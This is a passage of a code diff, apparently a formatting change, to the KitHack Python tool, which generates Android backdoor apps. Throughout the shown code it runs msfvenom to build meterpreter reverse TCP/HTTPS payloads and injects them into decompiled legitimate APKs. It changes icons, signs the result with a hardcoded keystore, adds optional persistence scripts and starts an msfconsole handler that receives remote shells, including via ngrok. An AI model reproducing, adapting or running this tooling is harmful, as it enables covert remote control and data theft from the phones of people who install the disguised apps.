"KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '03': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "03": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '04': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "04": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing 